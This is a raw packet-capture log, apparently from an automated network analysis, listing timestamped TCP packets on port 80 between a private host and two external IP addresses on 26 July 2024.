Jul 26, 2024 12:57:51.967206955 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:51.967227936 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:51.967242002 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:51.967262983 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:51.967276096 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:51.967297077 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:51.967309952 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:51.967344046 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:51.967482090 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:51.967514992 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:51.967541933 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:51.967549086 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:51.967562914 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:51.967583895 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:51.967598915 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:51.967617989 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:51.967633009 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:51.967669010 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:51.984237909 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:51.984289885 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:51.984324932 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:51.984325886 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:51.984352112 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:51.984364033 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:51.984371901 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:51.984412909 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:51.984519005 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:51.984570026 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:51.984575033 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:51.984608889 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:51.984623909 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:51.984657049 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:52.025482893 CEST	80	60840	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:52.025664091 CEST	60840	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:52.026288033 CEST	60840	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:52.031642914 CEST	80	60840	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:52.056118011 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:52.056188107 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:52.056197882 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:52.056224108 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:52.056238890 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:52.056262016 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:52.056272030 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:52.056296110 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:52.056312084 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:52.056344032 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:52.056349993 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:52.056385994 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:52.056401014 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:52.056420088 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:52.056437969 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:52.056452036 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:52.056469917 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:52.056499958 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:52.056523085 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:52.056556940 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:52.056574106 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:52.056590080 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:52.056607008 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:52.056622028 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:52.056641102 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:52.056658030 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:52.056672096 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:52.056706905 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:52.063668013 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:52.063726902 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:52.063735962 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:52.063761950 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:52.063776016 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:52.063808918 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:52.063827038 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:52.063859940 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:52.063879013 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:52.063894033 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:52.063910007 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:52.063927889 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:52.063945055 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:52.063977957 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:52.064202070 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:52.064234972 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:52.064259052 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:52.064270020 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:52.064301968 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:52.064302921 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:52.064318895 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:52.064337015 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:52.064351082 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:52.064369917 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:52.064383984 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:52.064403057 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:52.064420938 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:52.064438105 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:52.064454079 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:52.064474106 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:52.064500093 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:52.064526081 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:52.064716101 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:52.064749002 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:52.064774036 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:52.064781904 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:52.064796925 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:52.064815998 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:52.064829111 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:52.064847946 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:52.064862013 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:52.064881086 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:52.064894915 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:52.064914942 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:52.064932108 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:52.064946890 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:52.064963102 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:52.064979076 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:52.064997911 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:52.065011024 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:52.065030098 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:52.065046072 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:52.065062046 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:52.065078974 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:52.065098047 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:52.065113068 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:52.065129995 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:52.065145969 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:52.065162897 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:52.065179110 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:52.065196991 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:52.065213919 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:52.065229893 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:52.065263987 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:52.069005013 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:52.069039106 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:52.069072008 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:52.069073915 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:52.069096088 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:52.069107056 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:52.069120884 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:52.069139957 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:52.069159985 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:52.069175005 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:52.069185972 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:52.069207907 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:52.069221020 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:52.069241047 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:52.069257021 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:52.069277048 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:52.069288969 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:52.069312096 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:52.069325924 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:52.069344997 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:52.069359064 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:52.069379091 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:52.069391966 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:52.069425106 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:52.069430113 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:52.069464922 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:52.069478989 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:52.069498062 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:52.069513083 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:52.069533110 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:52.069545031 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:52.069566011 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:52.069581985 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:52.069602013 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:52.069612980 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:52.069636106 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:52.069650888 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:52.069669008 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:52.069684029 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:52.069701910 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:52.069716930 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:52.069736004 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:52.069751978 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:52.069767952 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:52.069783926 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:52.069801092 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:52.069817066 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:52.069833994 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:52.069849968 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:52.069868088 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:52.069883108 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:52.069900990 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:52.069916010 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:52.069933891 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:52.069948912 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:52.069966078 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:52.069982052 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:52.069998980 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:52.070014954 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:52.070030928 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:52.070049047 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:52.070065022 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:52.070079088 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:52.070100069 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:52.070112944 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:52.070133924 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:52.070147991 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:52.070182085 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:52.070478916 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:52.070513010 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:52.070528984 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:52.070545912 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:52.070561886 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:52.070580006 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:52.070595026 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:52.070611954 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:52.070626974 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:52.070646048 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:52.070660114 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:52.070678949 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:52.070693970 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:52.070712090 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:52.070727110 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:52.070745945 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:52.070759058 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:52.070780039 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:52.070794106 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:52.070812941 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:52.070827961 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:52.070847034 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:52.070862055 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:52.070879936 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:52.070895910 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:52.070914030 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:52.070928097 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:52.070945978 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:52.070960999 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:52.070979118 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:52.070991993 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:52.071012020 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:52.071026087 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:52.071047068 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:52.071060896 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:52.071094990 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:52.071885109 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:52.071919918 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:52.071937084 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:52.071953058 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:52.071969032 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:52.071988106 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:52.072001934 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:52.072035074 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:52.080185890 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:52.080239058 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:52.080251932 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:52.080274105 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:52.080287933 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:52.080322027 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:52.080463886 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:52.080518007 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:52.080523014 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:52.080552101 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:52.080570936 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:52.080600977 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:52.080769062 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:52.080828905 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:52.152347088 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:52.152416945 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:52.152452946 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:52.152527094 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:52.152561903 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:52.152576923 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:52.152576923 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:52.152576923 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:52.152576923 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:52.152595997 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:52.152614117 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:52.152646065 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:52.152682066 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:52.152734995 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:52.152734995 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:52.152770042 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:52.152787924 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:52.152803898 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:52.152822971 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:52.152837038 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:52.152856112 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:52.152870893 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:52.152889013 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:52.152921915 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:52.153390884 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:52.153425932 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:52.153451920 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:52.153459072 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:52.153476000 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:52.153491974 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:52.153506994 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:52.153527021 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:52.153539896 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:52.153561115 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:52.153575897 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:52.153594017 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:52.153609037 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:52.153626919 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:52.153645992 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:52.153661966 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:52.153678894 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:52.153719902 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:52.154392004 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:52.154443026 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:52.154464006 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:52.154532909 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:52.154547930 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:52.154567957 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:52.154577971 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:52.154601097 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:52.154613018 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:52.154634953 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:52.154645920 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:52.154669046 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:52.154680967 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:52.154704094 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:52.154716969 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:52.154736996 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:52.154751062 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:52.154772043 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:52.154783964 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:52.154819012 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:52.155333996 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:52.155385017 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:52.155390024 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:52.155419111 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:52.155437946 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:52.155452013 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:52.155473948 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:52.155483961 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:52.155503988 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:52.155517101 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:52.155528069 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:52.155550957 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:52.155569077 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:52.155586004 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:52.155601978 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:52.155618906 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:52.155635118 CEST	60836	80	192.168.2.6	198.46.178.145
